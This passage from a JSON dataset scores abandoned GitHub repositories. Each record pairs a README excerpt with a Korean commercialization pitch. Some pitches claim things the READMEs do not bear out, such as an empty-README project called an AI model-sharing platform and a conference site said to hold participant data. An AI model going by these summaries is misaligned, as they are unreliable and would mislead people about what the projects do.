dependencies\nnpm install\n\n# serve with hot reload at localhost:8080\nnpm run dev\n\n# build for production with minification\nnpm run build\n\n# build for production and view the bundle analyzer report\nnpm run build --report\n```\n\nFor a detailed explanation on how things work, check out the [guide](http://vuejs-templates.github.io/webpack/) and [docs for vue-loader](http://vuejs.github.io/vue-loader).\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"JeasonWong/R2Assistant","github_url":"https://github.com/JeasonWong/R2Assistant","stars":9,"language":"Java","license":"unknown","abandonment_months":103,"description":"# R2Assistant 보물 분석\n\n## 왜 보물인가\n클라우드 저장소 관리를 자동화하는 도구로, 파일 정리와 백업이 필요한 비즈니스들의 수작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업을 위한 자동 파일 백업 및 정리 구독 서비스로 월간 정기 수익 창출\n2. **내부 업무 도구**: 마케팅 에이전시의 ","readme_excerpt":"### R2Assistant\n\nwhen you use butterknife in sub module, once add a new resId in xml, you must rebuild your project for generating R2.java, it costs too much time.\n\nR2Assistant is a tool to generate R2.java's fields rapidly.\n\n[中文介绍](http://www.wangyuwei.me/2017/12/02/%E4%B8%80%E4%B8%AA%E5%BF%AB%E9%80%9F%E7%94%9F%E6%88%90R2-java%E4%B8%ADfields%E7%9A%84%E6%8F%92%E4%BB%B6/)\n\n#### SHOW\n\n![r2assistant.gif](http://ojafgwnc4.bkt.clouddn.com/r2assistant.gif)\n\n#### USAGE\n\n##### add the plugin in app's build.gradle\n\n```groovy\napply plugin: 'me.wangyuwei.r2assistant'\n\nbuildscript {\n    repositories {\n        maven {\n            url 'https://dl.bintray.com/wangyuwei/maven'\n        }\n    }\n    dependencies {\n        classpath 'me.wangyuwei:r2assistant-plugin:1.0.0'\n    }\n}\n```\n\n##### run command\n\nif you want to scan all of sub modules,\nrun `./gradlew sweepR2`\n\nif you want to scan specified module,\nrun `./gradlew sweepR2 -PmoduleName=${subModuleName}`\n\n#### TODO\n\n- ~~support add parameter to scan sp","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"MilesMcBain/wisegroup","github_url":"https://github.com/MilesMcBain/wisegroup","stars":9,"language":"R","license":"NOASSERTION","abandonment_months":79,"description":"","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# wisegroup\n\n<!-- badges: start -->\n\n[![Travis build\nstatus](https://travis-ci.org/milesmcbain/wisegroup.svg?branch=master)](https://travis-ci.org/milesmcbain/wisegroup)\n<!-- badges: end -->\n\n> Now I am become death, destroyer of groups….\n\nNever be burned by forgetting to `ungroup()` again.\n\nThis packages contains alternative versions of common group-aware\n`tidyverse` functions that either:\n\n  - automatically ungroup the returned data OR\n  - allow the developer to make explicit that groups are being carried\n    forward, signalling the potential for group related errors with a\n    ‘…’ variant of the orignal function, e.g. `mutate...`,\n    `summarise...` etc.\n\n## Installation\n\n``` r\nremotes::install_github(\"milesmcbain/wisegroup\")\n```\n\n## Usage\n\n`wisegroup` is designed to mask `tidyverse` functions in your global\nenvironment. It is recommended that you use this package in conjunction\nwith `conflicted`. This means th","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"DawnWdf/DWCollectionView","github_url":"https://github.com/DawnWdf/DWCollectionView","stars":9,"language":"Objective-C","license":"unknown","abandonment_months":66,"description":"# DWCollectionView 상용화 분석\n\n## 왜 보물인가\n앱에서 이미지나 상품을 아름답게 정렬해서 보여주는 화면을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 SaaS**: 온라인 쇼핑몰 앱에서 상품 목록을 예쁘게 표시하는 기능 제공\n2. **SNS/포트폴리오 서비스**: 사진이나 작업물을 갤러리처럼 보여주는 앱 ","readme_excerpt":"# DWCollectionView\n\n详细说明文档在：http://www.jianshu.com/p/b8b99a688d6a\n\n\n支持Carthage安装 github \"DawnWdf/DWCollectionView\"\n支持cocoaPods安装  pod \"DWCollectionView\"\n\n这是个对UICollectionView的简单封装，当我们在使用多种Cell类型的CollectionView的时候，基本上都是在各个代理类里面进行多个if-else处理。这个类则是通过转换代理对象的方式，将常用的代理方法分离出来，使得在注册一个cell、header、footer的时候可以将代码放在同一个区域内统一管理，提高代码可阅读性。 使用方法如下：\n\n    [self.collectionView registerViewAndModel:^(DWCollectionDelegateMaker *maker) {\n    \n    maker.registerCell([TeamInfoCell class],[TeamInfo class])\n    .itemSize(^(NSIndexPath *indexPath, id data){\n        return CGSizeMake(150, 150);\n    })\n    .adapter(^(UICollectionViewCell *cell, NSIndexPath *indexPath, id data){\n        TeamInfoCell *newCell = (TeamInfoCell *)cell;\n        [newCell bindData:data];\n    });\n    \n    \n    maker.registerHeader([LeagueHeaderReusableView class],[LeagueInfo class])\n    .sizeConfiger(^ CGSize (UICollectionViewLayout *layout , NSInteger section, id data){\n        return CGSizeMake(300, height_header);\n    })\n    .adapter(^(U","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"wdalmut/blockchain","github_url":"https://github.com/wdalmut/blockchain","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":105,"description":"# wdalmut/blockchain 보물 분석\n\n## 왜 보물인가\n블록체인 기술을 처음부터 직접 구축할 수 있는 실제 작동 코드로, 금융 시스템이나 보안이 중요한 모든 분야에서 활용 가능한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **거래 기록 관리 SaaS**: 기업 간 계약, 거래 내역을 변조 불가능하게 기록하고 관리하는 클라우드 서비스\n2.","readme_excerpt":"# Blockchain\n\nA pure javascript blockchain example\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"libredesktop/LibreDesktop-Specs","github_url":"https://github.com/libredesktop/LibreDesktop-Specs","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# LibreDesktop-Specs 평가 리포트\n\n## 왜 보물인가\n컴퓨터 운영체제의 기본 설계 원칙을 정리한 문서로, 새로운 OS를 만들려는 개발자들에게 참고할 수 있는 기술 명세서입니다.\n\n## 어디에 쓸 수 있나\n1. **OS 개발 교육 플랫폼**: 컴퓨터공학과나 온라인 코딩 학원에서 학생들에게 OS 설계 원칙을 가르치는 교재로 판매\n2. **기업 ","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"MeshCon/2015.meshcon.net","github_url":"https://github.com/MeshCon/2015.meshcon.net","stars":11,"language":"Less","license":"unknown","abandonment_months":43,"description":"# MeshCon/2015.meshcon.net 분석 보고서\n\n## 왜 보물인가\n2015년 메시콘 행사 웹사이트로, 네트워킹 행사 운영 노하우와 참가자 데이터를 담고 있어 유사 행사 플랫폼 구축에 참고할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 관리 SaaS**: 기업과 단체가 컨퍼런스/세미나를 온라인으로 운영할 수 있는 구독형 서비스로 제공","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"loklak/loklak_IBM_Home_Automation","github_url":"https://github.com/loklak/loklak_IBM_Home_Automation","stars":12,"language":"Python","license":"unknown","abandonment_months":119,"description":"# loklak_IBM_Home_Automation 분석\n\n## 왜 보물인가\n집 안의 모든 전자기기를 한 곳에서 통제할 수 있는 스마트홈 플랫폼으로, IoT 시대에 수요가 증가하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 SaaS 서비스**: 사용자가 구독료를 내고 자신의 집 조명, 에어컨, 잠금장치 등을 휴대폰으로 원격 제어하는 서비","readme_excerpt":"# IoT\nInternet of Things based home automation project using IBM IoTF platform.\nOriginal Tutorial:  http://diyhacking.com/raspberry-pi-home-automation-ibm-bluemix/\n\nThis repository consists of two scripts:\nclient.py - This python script runs on the Raspberry Pi. It accepts commands from the server and pushes data from a PIR motion sensor to the IBM IoTF platform, At the same time it also cretes the impact\n\nserver.py - This python script runs on the web server and issues commands that control the GPIO pins on the Raspberry Pi. Before running this script on the server, you should install the corresponding packages for IBM IoTF by doing `pip install ibmiotf`. The server also pushes the same data to loklak, this is done by installing the loklak python SDK by doing `pip install python-loklak-api`\n\n1. Sending commands to the Raspberry Pi\nThe server side script running on our laptop or on a web server takes input commands from the user and correspondingly sends it to the client (Raspberry Pi)","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"U2FsdGVkX1/ggk","github_url":"https://github.com/U2FsdGVkX1/ggk","stars":6,"language":"","license":"unknown","abandonment_months":103,"description":"# U2FsdGVkX1/ggk 저장소 분석\n\n## 왜 보물인가\n저장소명이 암호화되어 있고 설명이 없어 실제 기능을 파악하기 어려우므로, 현 정보만으로는 가치 판단이 불가능합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 암호화된 데이터 관리가 필요한 기업의 비밀 정보 저장 시스템\n2. **SaaS 서비스**: 사용자 개인정보를 안전하게 보관","readme_excerpt":"# ggk\n\n扒自[远景论坛](http://bbs.pcbeta.com)\n\n引入它可使你网站单击左键时弹出中国社会主义核心价值观（效果图如下\n\n![](https://i.imgur.com/xXIFcH0.png)\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ffii/FFII-Artwork","github_url":"https://github.com/ffii/FFII-Artwork","stars":11,"language":"","license":"unknown","abandonment_months":75,"description":"# FFII-Artwork 저장소 분석\n\n## 왜 보물인가\n자유 소프트웨어 운동의 역사적 자산을 시각적으로 기록한 아트워크 컬렉션으로, 오픈소스 커뮤니티의 정체성을 담고 있는 디지털 문화유산입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 오픈소스 역사와 철학을 가르치는 강좌의 교육 자료로 활용\n- **기업 내부 교육**: 스타트업이나 테","readme_excerpt":"# FFII-Artwork\nFFII Artwork\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"OpnTec/openxlab","github_url":"https://github.com/OpnTec/openxlab","stars":12,"language":"HTML","license":"unknown","abandonment_months":63,"description":"# OpnTec/openxlab 기술 가치 분석\n\n## 왜 보물인가\nOpenXLab은 AI 모델을 쉽게 공유하고 실행할 수 있는 플랫폼으로, 전문가가 아닌 일반인도 최신 AI 기술을 간단히 체험할 수 있게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 모델 공유 플랫폼 (SaaS)**\n기업이나 연구팀이 자신들이 만든 AI 모델을 안전하게 공","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"yavorsky/Bump","github_url":"https://github.com/yavorsky/Bump","stars":6,"language":"Python","license":"unknown","abandonment_months":104,"description":"# Bump 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2017년으로 6년 이상 방치되어 있어 현재 활용 가치가 제한적입니다.\n\n## 어디에 쓸 수 있나\n- **패키지 관리 자동화 SaaS**: 소프트웨어 버전 관리를 자동으로 처리해주는 구독 서비스\n- **개발팀 내부 도구**: 회사 개발자들이 코드 업데이트 과정을 간편하게 하는 자동화 솔루션\n- ","readme_excerpt":"Bump\n=============\n\nA package allows to preview and manage latest versions of [npm](https://npmjs.com)/[yarn](https://yarnpkg.com) packages easily.\nInspired by the vscode feature, but was rethought and enhanced.\n\nFor now, it allows:\n\n- Show **latest** released package version.\n- Show **next** (alpha, beta, etc) package version.\n- Compare semver versions and detect whether or not current version should be updated.\n- Format to **latest** or **next** version from the context menu.\n- Use custom registries.\n- Customize tooltip for your needs and taste.\n\n\n![Demo of latest usage](https://raw.githubusercontent.com/yavorsky/Bump/master/img/preview.gif)\n\n  ​\n## Installation\n\n#### Install Bump via Package Control\n\nThe easiest and recommended way to install Bump is using [Package Control](https://packagecontrol.io/packages/Bump).\n\nFrom the **main application menu** (CMD + SHIFT + P), navigate to:\n\n`Tools` -> `Command Palette...` -> `Package Control: Install Package`, type the word **Bump**, then s","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"golemfactory/golem","github_url":"https://github.com/golemfactory/golem","stars":5,"language":"","license":"gpl-3.0","abandonment_months":63,"description":"# Golem 프로젝트 분석\n\n## 왜 보물인가\n누구나 자신의 컴퓨터 여유 자원을 공유해서 돈을 버는 동시에, 필요한 사람은 저렴한 가격에 컴퓨팅 능력을 빌릴 수 있는 글로벌 공유 네트워크입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 모델 학습 서비스**: 대학이나 스타트업이 비싼 고성능 서버 없이 저렴하게 인공지능 모델을 학습할 수 있는 클라우드 서","readme_excerpt":"# Golem\n\nWelcome to Golem's brave new world!\n\nThe development of Golem as a platform is now taking place in several new repositories.\n\nGolem's new implementation is called `yagna` and resides in the [yagna](https://github.com/golemfactory/yagna) repository.\n\n## Providers\n\nTo become a Golem provider, please follow the instructions in our [Provider's handbook](https://handbook.golem.network/provider-tutorials/provider-tutorial)\n\n## Requestors\n\nOn the other hand, if you're interested in running or developing applications on Golem, please have a look at:\n\n* [Requestor's handbook](https://handbook.golem.network/requestor-tutorials/)\n* [Python API](https://github.com/golemfactory/yapapi)\n* [JS API](https://github.com/golemfactory/yajsapi/)\n\n\n## Clay Golem\n\nClay Golem has been discontinued and moved to the [clay](https://github.com/golemfactory/clay) repository.\n\nIf you'd like to continue to sync your local `git` repository, please update your origin with the new location:\n\n```bash\ngit remote","composite_score":0.3002,"license_safety_tag":"restricted"},{"name":"OpnTec/libredesktop-meta","github_url":"https://github.com/OpnTec/libredesktop-meta","stars":12,"language":"","license":"unknown","abandonment_months":117,"description":"# LibreDesktop Meta 저장소 분석\n\n## 왜 보물인가\n무료 오픈소스 데스크톱 환경을 구축하기 위한 메타 프로젝트로, 상용 소프트웨어 구매 비용을 절감하려는 기업과 개인에게 가치 있는 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 업무 도구 SaaS**: 저비용 데스크톱 환경이 필요한 중소기업용 클라우드 워크스테이션 서비스\n2. **교","readme_excerpt":"# libredesktop-meta\n\nThe libredesktop-meta package takes care of customizing packages and settings for the libredesktop.\n\n## Customizing browser settings\nIn the browser settings custom search, tiles, snippets can be set for browsers.\n\n### What are we changing in the Firefox browser?\n\n1) Directory Tiles:\nin about:config: browser.newtabpage.directory.source\nWert: https://tiles.services.mozilla.com/v2/links/fetch/%LOCALE%\nhttps://tiles.services.mozilla.com/v2/links/fetch/de für Deutsch.\n\n2) about:home Snippets:\nin about:config: browser.aboutHomeSnippets.updateUrl\nWert: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/\n(ich weiß nicht, was jeder Parameter \"übersetzt\" liefert\n\n3) Search\n\n\n## How and where do we configure profiles?\n\nIm Profilverzeichnis eine Datei mit dem Namen user.js kann zur Konfiguration benutzt werden:\nhttp://kb.mozillazine.org/User.js_file\n\nResources\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/meilix-art","github_url":"https://github.com/meilix/meilix-art","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# meilix-art 저장소 분석\n\n## 왜 보물인가\n미닉스 리눅스 운영체제의 미적 디자인 자산을 모아놓은 곳으로, 오픈소스 프로젝트의 시각적 완성도를 높이는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **리눅스 배포판 커스터마이징 서비스**: 기업이나 학교용 맞춤형 운영체제 디자인을 제공하는 SaaS\n2. **오픈소스 프로젝트 브랜딩 도구","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"fossasia/wp-rotatingtweets","github_url":"https://github.com/fossasia/wp-rotatingtweets","stars":10,"language":"PHP","license":"unknown","abandonment_months":28,"description":"# WP Rotating Tweets 사업화 분석\n\n## 왜 보물인가\n트위터 글들을 자동으로 돌아가며 보여주는 기능으로, 소셜미디어 마케팅을 손쉽게 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소상공인을 위한 \"SNS 자동 게시판\" - 매월 정기 구독료로 수익화\n2. **내부 업무 도구**: 대형 마케팅팀의 캠페인 자동화","readme_excerpt":"=== Rotating Tweets (Twitter widget and shortcode) ===\r\n\r\nContributors: mpntod\r\nDonate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9XCNM4QSVHYT8\r\nTags: shortcode,widget,twitter,rotating,rotate,rotator,tweet,tweets,animation,jquery,jquery cycle,cycle,multilingual,responsive,page builder\r\nRequires at least: 3.2\r\nTested up to: 4.3\r\nStable tag: 1.7.18\r\nLicense: GPLv2 or later\r\nLicense URI: http://www.gnu.org/licenses/gpl-2.0.html\r\n\r\nTwitter widget and shortcode to show your latest tweets one at a time an animated rotation\r\n\r\n== Description ==\r\n\r\n* **Replaces a [shortcode](http://codex.wordpress.org/Shortcode) such as `[rotatingtweets screen_name='your_twitter']`, or a [widget](http://codex.wordpress.org/WordPress_Widgets), with a rotating display of your most recent tweets**\r\n* **Supports v 1.1 of the Twitter API** ([i.e. it still works](https://blog.twitter.com/2013/api-v1-is-retired))\r\n* **Space efficient** - instead of showing all your tweets at once, show","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"jaksi/advent-of-other-peoples-code","github_url":"https://github.com/jaksi/advent-of-other-peoples-code","stars":5,"language":"Python","license":"unknown","abandonment_months":90,"description":"# jaksi/advent-of-other-peoples-code 평가\n\n## 왜 보물인가\n프로그래밍 문제 풀이 코드들을 모아둔 학습 자료로, 다양한 사람들의 문제 해결 방식을 한 곳에서 비교하며 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 학습 플랫폼**: \"다른 사람의 풀이 보기\" 기능으로 학생들이 여러 풀이 방식을 학습\n2. *","readme_excerpt":"# Advent of Other People's Code\nFetches random solutions to a specified [Advent of Code](https://adventofcode.com/) puzzle from GitHub and runs them against your input\n![Grinch](grinch.png)\n## Usage\nLet me rephrase. This is going to get some random code from GitHub and run it on your machine. Don't use it.\n\n## Really tho\n### Create a virtualenv\n```sh\npython3 -m venv env\nsource env/bin/activate\n```\n\n### Install requirements\n```sh\npip install -r requirements.txt\n```\n\n### Genrate a GitHub personal access token\n[Right here](https://github.com/settings/tokens/new), with the `public_repo` scope.\n\n### Run it\nPlease, don't!\n\n### I said run it!\n```shellsession\n$ python advent.py --token $GITHUB_TOKEN --year 2018 --day 3 --input input.txt\nPatching open() to always return your input file\nSearching for repositories\nSearching for a solution in Karlovsky120/AdventOfCode2018\nSearching for a solution in grey-area/advent-of-code-2018\nSearching for a solution in stefsiekman/aoc2018\nSearching for a solut","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"qmkakaxi/FederatedLearning","github_url":"https://github.com/qmkakaxi/FederatedLearning","stars":6,"language":"Python","license":"unknown","abandonment_months":78,"description":"# FederatedLearning 저장소 분석\n\n## 왜 보물인가\n여러 기관이 자신의 데이터를 공개하지 않으면서도 함께 AI 모델을 만들 수 있는 기술로, 의료·금융 같은 민감한 산업에서 혁신적인 해결책입니다.\n\n## 어디에 쓸 수 있나\n1. **병원 네트워크 진단 AI 서비스**: 환자 데이터를 공개하지 않고 여러 병원의 의료 영상 분석 모델을 공동으로","readme_excerpt":"# FederatedLearning\n\n基于pytorch和nccl实现的简易联邦学习和数据质量评估系统\n\n## 实验环境（USTC linke实验室）：\n\n 1. 四台深度学习服务器，每台服务器配有48个Xeon CPU核，128G 内存和4个Tesla P100 GPU卡。（第一台只有三个GPU卡）\n 2. 四台服务器都在同一个局域网内，相互可以ping通。\n 3. python 3.5.2   pytorch 1.3.0 \n 4. cuda 9.2       nccl 2.3.4\n \n ## 实现：\n \n ### federatedlearning\n \n   本次实验使用gpu作为一个client，每个client拥有自己数据，client在本地进行训练后，将梯度数据传给server，由server整合后分发给所有client。nccl不支持pytorch框架的send和rev方法，实验使用boradcast模拟send和rev，server和每个client建立一个group，保证client向server发送消息时，不会被其他client收到。\n   \n### influencefunction\n关于influence function，详见论文：Understanding Black-box Predictions via Influence Functions\n(https://arxiv.org/pdf/1703.04730.pdf)\n\n1. srochaastic estimation:\n   该方法在Understanding Black-box Predictions via Influence Functions提出，在联邦学习场景下，由server和client交互迭代计算stest，计算完成后，server将最终的stest发给所有client，client根据训练数据的grad和stest计算influencefunction，然后发送给server。在计算influencefunction过程中，client只能得到stest，不能获取到其他client和data和grad。(封装在models.influence)\n   \n2. Randomized Kaczmarz Algorithm:\n   该方法在论文A Randomiz","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"OnebugIS/React---project","github_url":"https://github.com/OnebugIS/React---project","stars":8,"language":"CSS","license":"unknown","abandonment_months":103,"description":"# OnebugIS/React---project 평가 보고서\n\n## 왜 보물인가\n웹사이트를 빠르고 쉽게 만들 수 있게 도와주는 React 기반의 프로젝트로, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 웹 기반 관리 시스템(CRM, 인사관리 도구 등)으로 월 구독료 수익화\n- **내부 ","readme_excerpt":"# React---project\n基于React构造的桐乡网\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"tridge/SonyCamera","github_url":"https://github.com/tridge/SonyCamera","stars":5,"language":"Python","license":"unknown","abandonment_months":137,"description":"# SonyCamera 저장소 분석\n\n## 왜 보물인가\n소니 카메라를 컴퓨터로 원격 제어하고 사진을 자동으로 받을 수 있는 기술로, 사진 촬영 워크플로우를 획기적으로 간단하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 촬영 SaaS**: 부동산 중개소가 월 구독으로 카메라 원격제어 소프트웨어를 사용해 일관된 품질의 사진을 자동 수집\n2.","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"inconvergent/linearx-font","github_url":"https://github.com/inconvergent/linearx-font","stars":7,"language":"Python","license":"OFL-1.1","abandonment_months":98,"description":"# LinearX Font 분석\n\n## 왜 보물인가\n독특한 기하학적 디자인의 폰트로, 현대적인 디지털 인터페이스와 브랜딩에 필요한 차별화된 시각 자산을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 회사의 웹사이트와 앱 인터페이스에서 프리미엄 폰트로 제공하는 구독 기능\n2. **내부 업무 도구**: 디자인 팀이 사용하는 폰트 라","readme_excerpt":"# Linearx TTF font\n\nProcedurally generated fonts. \n\nI might improve upon the generation. The first batch is not as good as I'd like. \n\nStay tuned for more. \n\nFor some more details, see: https://inconvergent.net/mechanical-plotter-drawings/4/\n\n## Batches\n\n - [batch-20171130-01](batch-20171130-01)\n - [batch-20171201-01](batch-20171201-01)\n\n\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ffii/FFII-blog","github_url":"https://github.com/ffii/FFII-blog","stars":11,"language":"","license":"AGPL-3.0","abandonment_months":103,"description":"# FFII-blog 상용화 분석\n\n## 왜 보물인가\n유럽의 주요 정책 이슈를 추적하고 분석하는 블로그 플랫폼으로, 정책 관심층을 위한 신뢰할 수 있는 정보 제공 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **정책 뉴스레터 SaaS**: 유럽 정책 변화를 자동으로 분류해 구독자에게 맞춤형으로 배달하는 구독 서비스\n2. **정책 분석 플랫폼**: NGO·싱","readme_excerpt":"# FFII-blog\nFFII Blog\n","composite_score":0.3002,"license_safety_tag":"risky"},{"name":"loklak/loklak_wok_desktop","github_url":"https://github.com/loklak/loklak_wok_desktop","stars":12,"language":"Java","license":"unknown","abandonment_months":124,"description":"# loklak_wok_desktop 보물 분석\n\n## 왜 보물인가\n소셜 미디어의 방대한 데이터를 한 곳에서 검색하고 분석할 수 있는 데스크톱 도구로, 마케팅·언론·연구 분야에서 트렌드 파악과 여론 조사에 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 모니터링 플랫폼으로 기업들에게 월 구독 형태로 제공\n- **내","readme_excerpt":"# Loklak Wok Desktop\nThe goal of this project is to provide a desktop version of [Loklak Wok Android](https://github.com/loklak/loklak_wok_android). The origin of the project is a [tweet by @Frank_gamefreak](https://twitter.com/Frank_gamefreak/status/706458848522080256).\n\n![Screenshot](https://github.com/Low012/loklak_wok_desktop/blob/master/stuff/screenshot.png \"Screenshot\")\n\n\n##How to compile and run\n* import required lib by running **setup.sh**\n* compile with **mvn clean install -Pexecutable-jar**\n* run artifact in *target* dircetory: **java -jar wok-desktop-0.0.1-SNAPSHOT-jar-with-all-dependencies.jar**\n* stop program with ESC key\n\n##To be done\n* The code has been hacked and butchered and is some kind of Frankenstein. It needs cleanup.\n* Font size is hardcoded. How ugly is that?\n* It would be cool to have a project for code shared between Android and Desktop version.\n* The only dependency which can not be resolved via Maven is [loklakj](https://github.com/loklak/loklakj_lib). Would","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"Kreijstal/RainbProxy","github_url":"https://github.com/Kreijstal/RainbProxy","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":143,"description":"# RainbProxy 상용화 분석\n\n## 왜 보물인가\n인터넷 연결을 우회하거나 숨길 필요가 있는 사람들을 위해 안전하게 접속할 수 있는 길을 만들어주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 솔루션**: 회사 직원들이 공용 와이파이에서 안전하게 업무 데이터를 주고받을 수 있는 보안 도구로 제공\n2. **개인용 VPN 서비스**: 개인 ","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"timothyjensen/organize-admin-notices","github_url":"https://github.com/timothyjensen/organize-admin-notices","stars":6,"language":"PHP","license":"unknown","abandonment_months":74,"description":"# organize-admin-notices 기술 평가\n\n## 왜 보물인가\n워드프레스 관리자 화면의 알림 메시지를 깔끔하게 정리해주는 작은 도구로, 사용자 경험을 개선하는 니치한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **워드프레스 호스팅 회사의 부가 서비스**: 고객 대시보드를 깔끔하게 유지해 만족도 향상\n2. **웹사이트 관리 대행 업체의 내부 ","readme_excerpt":"# Organize Admin Notices\nA simple WordPress plugin that lets users toggle the visibility of admin notices.\n\n## Usage\nInstall and activate the plugin; there are no settings to configure.\n\n**Before**\n![before](https://www.timjensen.us/wp-content/uploads/2019/11/unorganized-admin-notices.png)\n\n**After**\n![after](https://www.timjensen.us/wp-content/uploads/2019/11/organized-admin-notices.gif)\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"karaggeorge/mac-window-select","github_url":"https://github.com/karaggeorge/mac-window-select","stars":5,"language":"Swift","license":"unknown","abandonment_months":78,"description":"# mac-window-select 분석\n\n## 왜 보물인가\nMac 사용자들이 여러 창을 효율적으로 관리할 수 있게 해주는 작은 도구로, 업무 생산성을 높이는 간단하면서도 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Mac용 생산성 앱(Notion, Slack, Figma 등)에 통합하여 창 관리 기능 제공\n2. **내부","readme_excerpt":"# mac-window-select\n\n> Prompt the user to select a window on macOS, mimicking the native screenshot utility\n\nRequires macOS 10.12 or later. macOS 10.13 or earlier needs to download the [Swift runtime support libraries](https://support.apple.com/kb/DL1998).\n\n## Install\n\n```\n$ npm install mac-window-select\n```\n\n## Usage\n\n```js\nconst selectWindow = require('mac-window-select');\n\nselectWindow({appsToIgnore: ['iTerm2']}).then(console.log);\n\n// {\n//   canceled: false,\n//   window: {\n//     ownerName: 'Google Chrome',\n//     name: 'karaggeorge/mac-window-select: Select a window on macOS, mimicking the native screenshot utility',\n//     y: 23,\n//     x: 1920,\n//     width: 1920,\n//     height: 1057,\n//     number: 141349,\n//     pid: 69132\n//   }\n// }\n\nconst process = selectWindow().then(console.log);\n\nprocess.cancel();\n\n// {\n//   canceled: true,\n//   window: undefined\n// }\n```\n\n## Demo\n\n<img src=\"media/demo.gif\" width=\"600\">\n\n## API\n\n### `selectWindow(options?: {appsToIgnore: string[]}): PCan","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"facebesidewyj/util","github_url":"https://github.com/facebesidewyj/util","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":92,"description":"# facebesidewyj/util 상용화 분석\n\n## 왜 보물인가\n개발자들이 반복적으로 작성하는 코드를 미리 만들어 제공함으로써 개발 시간을 단축할 수 있는 재사용 가능한 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 고객사의 소프트웨어 개발팀에 구독 기반으로 이 도구 모음을 제공하는 개발자 협업 플랫폼\n- **내부 업무","readme_excerpt":"# JavaScript工具库\n\n在学习JS的过程中，自己手动实现了一些常用的小功能，方便我们平时的开发，现在把这个项目开源出来，供大家学习，共同进步。 语法标准：ECMASript5。\n\n> 本项目供学习使用，如有必要使用到生产项目中，请做好测试。由于本人水平有限，很多地方没有考虑周到，难免会出现Bug，请多多见谅！\n\n本项目持续更新，下面是API使用文档。\n\n## Functions\n\n<dl>\n  <dt><a href=\"#newTypeof\">newTypeof(obj, type)</a> ⇒ <code>Boolean</code></dt>\n  <dd>\n  <p>元素类型判断</p>\n</dd>\n  <dt>\n  <a href=\"#shallowCopy\">shallowCopy(obj, res)</a>\n</dt>\n  <dd>\n  <p>对象浅复制</p>\n</dd>\n  <dt><a href=\"#trim\">trim(str, type)</a> ⇒ <code>String</code></dt>\n  <dd>\n  <p>字符串去空格</p>\n</dd>\n  <dt><a href=\"#repeatStr\">repeatStr(str, count)</a> ⇒ <code>String</code></dt>\n  <dd>\n  <p>重复循环字符串</p>\n</dd>\n  <dt><a href=\"#toggleCase\">toggleCase(str)</a> ⇒ <code>String</code></dt>\n  <dd>\n  <p>字符串大小写转换</p>\n</dd>\n  <dt><a href=\"#countStr\">countStr(str, subStr)</a> ⇒ <code>String</code></dt>\n  <dd>\n  <p>统计字符串出现的次数</p>\n</dd>\n  <dt><a href=\"#checkParametersType\">checkParametersType(str, 